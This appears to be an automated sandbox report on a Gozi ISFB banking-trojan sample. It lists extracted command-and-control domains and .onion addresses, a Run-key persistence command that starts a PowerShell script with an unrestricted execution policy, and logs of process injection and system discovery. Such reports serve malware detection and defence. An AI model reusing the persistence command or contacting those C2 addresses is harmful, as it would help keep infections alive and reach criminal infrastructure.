gozi_ifsb | e7aa4654e986159f2c282213cdf48ff7e1a24ec7d929b463bd989572e12a5b2d

Analysis

max time kernel
1201s
max time network
1050s
platform
windows10_x64
resource
win10-en
submitted
08-09-2021 16:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

5B
MD5

53f31a089339194f333d2e3995dbb05e
SHA1

d929c82d2ee727ccbea9c50c669a71075249899f
SHA256

86b0c5a1e2b73b08fd54c727f4458649ed9fe3ad1b6e8ac9460c070113509a1e
SHA512

d6f0e8c65e1fe60e81be2aee69b09b9a5df7519dff082cc4e51a705fb044a34db7198b40d480df0a048e32a7d2cf0c4090d64af123a5d852c21c8a35de4ff3fc

Score

10^/10

gozi_ifsb 1500 banker persistence trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

1500

atl.bigbigpoppa.com

pop.urlovedstuff.com

art.microsoftsofymicrosoftsoft.at

r23cirt55ysvtdvl.onion

fop.langoonik.com

poi.redhatbabby.at

pop.biopiof.at

l46t3vgvmtx5wxe6.onion

v10.avyanok.com

apr.intoolkom.at

fgx.dangerboy.at

Attributes

build
250211
exe_type
loader
server_id
580

rsa_pubkey.plain

aes.plain

rsa_pubkey.plain

serpent.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

calc.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4824 68 calc.exe
Blocklisted process makes network request 3 IoCs

Processes:

rundll32.exe

flow pid process

22 4584 rundll32.exe
23 4584 rundll32.exe
24 4584 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4584 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	68	calc.exe

flow	pid	process
22	4584	rundll32.exe
23	4584	rundll32.exe
24	4584	rundll32.exe

pid	process
4584	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\UnmarkHandler = "cmd /c start C:\\Users\\Admin\\UnmarkHandler.lnk -ep unrestricted -file C:\\Users\\Admin\\StopSettings.ps1"	Explorer.EXE

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 840 set thread context of 2708	840	powershell.exe	Explorer.EXE
PID 2708 set thread context of 3552	2708	Explorer.EXE	RuntimeBroker.exe
PID 2708 set thread context of 1540	2708	Explorer.EXE	cmd.exe
PID 1540 set thread context of 980	1540	cmd.exe	PING.EXE
PID 2708 set thread context of 3308	2708	Explorer.EXE	WinMail.exe
PID 2708 set thread context of 3388	2708	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

4400 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2864 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2728 systeminfo.exe

pid	process
4400	net.exe

pid	process
2864	tasklist.exe

pid	process
2728	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 63 IoCs

Processes:

calc.exeexplorer.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings	calc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 78003100000000002153c9681100557365727300640009000400efbe724a0b5d2153c9682e000000320500000000010000000000000000003a0000000000701ed20055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "2"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 50003100000000002153986b10004c6f63616c003c0009000400efbe2153c9682153986b2e000000345301000000010000000000000000000000000000006960f7004c006f00630061006c00000014000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 50003100000000002153da72100041646d696e003c0009000400efbe2153c9682153da722e00000016530100000001000000000000000000000000000000ff206f00410064006d0069006e00000014000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 4e003100000000002853f782100054656d7000003a0009000400efbe2153c9682853f7822e00000035530100000001000000000000000000000000000000722b9800540065006d007000000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000002153c96812004170704461746100400009000400efbe2153c9682153c9682e000000215301000000010000000000000000000000000000002fbcb0004100700070004400610074006100000016000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "VBSFile"	cmd.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

980 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

explorer.exe

pid process

848 explorer.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

980 PING.EXE

pid	process
980	PING.EXE

pid	process
848	explorer.exe

pid	process
980	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exerundll32.exepowershell.exeExplorer.EXE

pid	process
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
3936	powershell.exe
3936	powershell.exe
3936	powershell.exe
4584	rundll32.exe
4584	rundll32.exe
840	powershell.exe
840	powershell.exe
840	powershell.exe
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE
2708	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exeExplorer.EXE

pid process

848 explorer.exe
2708 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

840 powershell.exe
2708 Explorer.EXE
2708 Explorer.EXE
1540 cmd.exe
2708 Explorer.EXE
2708 Explorer.EXE

pid	process
848	explorer.exe
2708	Explorer.EXE

pid	process
840	powershell.exe
2708	Explorer.EXE
2708	Explorer.EXE
1540	cmd.exe
2708	Explorer.EXE
2708	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe7zG.exepowershell.exepowershell.exeExplorer.EXEWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeRestorePrivilege	1720	7zG.exe
Token: 35	1720	7zG.exe
Token: SeSecurityPrivilege	1720	7zG.exe
Token: SeSecurityPrivilege	1720	7zG.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeShutdownPrivilege	2708	Explorer.EXE
Token: SeCreatePagefilePrivilege	2708	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3840	WMIC.exe
Token: SeSecurityPrivilege	3840	WMIC.exe
Token: SeTakeOwnershipPrivilege	3840	WMIC.exe
Token: SeLoadDriverPrivilege	3840	WMIC.exe
Token: SeSystemProfilePrivilege	3840	WMIC.exe
Token: SeSystemtimePrivilege	3840	WMIC.exe
Token: SeProfSingleProcessPrivilege	3840	WMIC.exe
Token: SeIncBasePriorityPrivilege	3840	WMIC.exe
Token: SeCreatePagefilePrivilege	3840	WMIC.exe
Token: SeBackupPrivilege	3840	WMIC.exe
Token: SeRestorePrivilege	3840	WMIC.exe
Token: SeShutdownPrivilege	3840	WMIC.exe
Token: SeDebugPrivilege	3840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3840	WMIC.exe
Token: SeRemoteShutdownPrivilege	3840	WMIC.exe
Token: SeUndockPrivilege	3840	WMIC.exe
Token: SeManageVolumePrivilege	3840	WMIC.exe
Token: 33	3840	WMIC.exe
Token: 34	3840	WMIC.exe
Token: 35	3840	WMIC.exe
Token: 36	3840	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3840	WMIC.exe
Token: SeSecurityPrivilege	3840	WMIC.exe
Token: SeTakeOwnershipPrivilege	3840	WMIC.exe
Token: SeLoadDriverPrivilege	3840	WMIC.exe
Token: SeSystemProfilePrivilege	3840	WMIC.exe
Token: SeSystemtimePrivilege	3840	WMIC.exe
Token: SeProfSingleProcessPrivilege	3840	WMIC.exe
Token: SeIncBasePriorityPrivilege	3840	WMIC.exe
Token: SeCreatePagefilePrivilege	3840	WMIC.exe
Token: SeBackupPrivilege	3840	WMIC.exe
Token: SeRestorePrivilege	3840	WMIC.exe
Token: SeShutdownPrivilege	3840	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7zG.exe

pid process

1720 7zG.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

explorer.exeOpenWith.exe

pid process

848 explorer.exe
848 explorer.exe
848 explorer.exe
848 explorer.exe
4592 OpenWith.exe

pid	process
1720	7zG.exe

pid	process
848	explorer.exe
848	explorer.exe
848	explorer.exe
848	explorer.exe
4592	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.execmd.exeexplorer.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.exe

description	pid	process	target process
PID 4348 wrote to memory of 2000	4348	powershell.exe	cmd.exe
PID 4348 wrote to memory of 2000	4348	powershell.exe	cmd.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	explorer.exe
PID 2000 wrote to memory of 1292	2000	cmd.exe	explorer.exe
PID 848 wrote to memory of 1720	848	explorer.exe	7zG.exe
PID 848 wrote to memory of 1720	848	explorer.exe	7zG.exe
PID 2000 wrote to memory of 1972	2000	cmd.exe	cscript.exe
PID 2000 wrote to memory of 1972	2000	cmd.exe	cscript.exe
PID 2000 wrote to memory of 2316	2000	cmd.exe	notepad.exe
PID 2000 wrote to memory of 2316	2000	cmd.exe	notepad.exe
PID 2000 wrote to memory of 2428	2000	cmd.exe	findstr.exe
PID 2000 wrote to memory of 2428	2000	cmd.exe	findstr.exe
PID 848 wrote to memory of 3696	848	explorer.exe	WScript.exe
PID 848 wrote to memory of 3696	848	explorer.exe	WScript.exe
PID 2000 wrote to memory of 3936	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 3936	2000	cmd.exe	powershell.exe
PID 2000 wrote to memory of 4520	2000	cmd.exe	rundll32.exe
PID 2000 wrote to memory of 4520	2000	cmd.exe	rundll32.exe
PID 4520 wrote to memory of 4584	4520	rundll32.exe	rundll32.exe
PID 4520 wrote to memory of 4584	4520	rundll32.exe	rundll32.exe
PID 4520 wrote to memory of 4584	4520	rundll32.exe	rundll32.exe
PID 220 wrote to memory of 840	220	mshta.exe	powershell.exe
PID 220 wrote to memory of 840	220	mshta.exe	powershell.exe
PID 840 wrote to memory of 2308	840	powershell.exe	csc.exe
PID 840 wrote to memory of 2308	840	powershell.exe	csc.exe
PID 2308 wrote to memory of 2060	2308	csc.exe	cvtres.exe
PID 2308 wrote to memory of 2060	2308	csc.exe	cvtres.exe
PID 840 wrote to memory of 1580	840	powershell.exe	csc.exe
PID 840 wrote to memory of 1580	840	powershell.exe	csc.exe
PID 1580 wrote to memory of 1008	1580	csc.exe	cvtres.exe
PID 1580 wrote to memory of 1008	1580	csc.exe	cvtres.exe
PID 840 wrote to memory of 2708	840	powershell.exe	Explorer.EXE
PID 840 wrote to memory of 2708	840	powershell.exe	Explorer.EXE
PID 840 wrote to memory of 2708	840	powershell.exe	Explorer.EXE
PID 840 wrote to memory of 2708	840	powershell.exe	Explorer.EXE
PID 2708 wrote to memory of 3552	2708	Explorer.EXE	RuntimeBroker.exe
PID 2708 wrote to memory of 3552	2708	Explorer.EXE	RuntimeBroker.exe
PID 2708 wrote to memory of 1540	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 1540	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 1540	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 3552	2708	Explorer.EXE	RuntimeBroker.exe
PID 2708 wrote to memory of 3552	2708	Explorer.EXE	RuntimeBroker.exe
PID 2708 wrote to memory of 1540	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 1540	2708	Explorer.EXE	cmd.exe
PID 1540 wrote to memory of 980	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 980	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 980	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 980	1540	cmd.exe	PING.EXE
PID 1540 wrote to memory of 980	1540	cmd.exe	PING.EXE
PID 2708 wrote to memory of 1560	2708	Explorer.EXE	cmd.exe
PID 2708 wrote to memory of 1560	2708	Explorer.EXE	cmd.exe
PID 1560 wrote to memory of 2976	1560	cmd.exe	nslookup.exe
PID 1560 wrote to memory of 2976	1560	cmd.exe	nslookup.exe
PID 2708 wrote to memory of 2712	2708	Explorer.EXE	cmd.exe
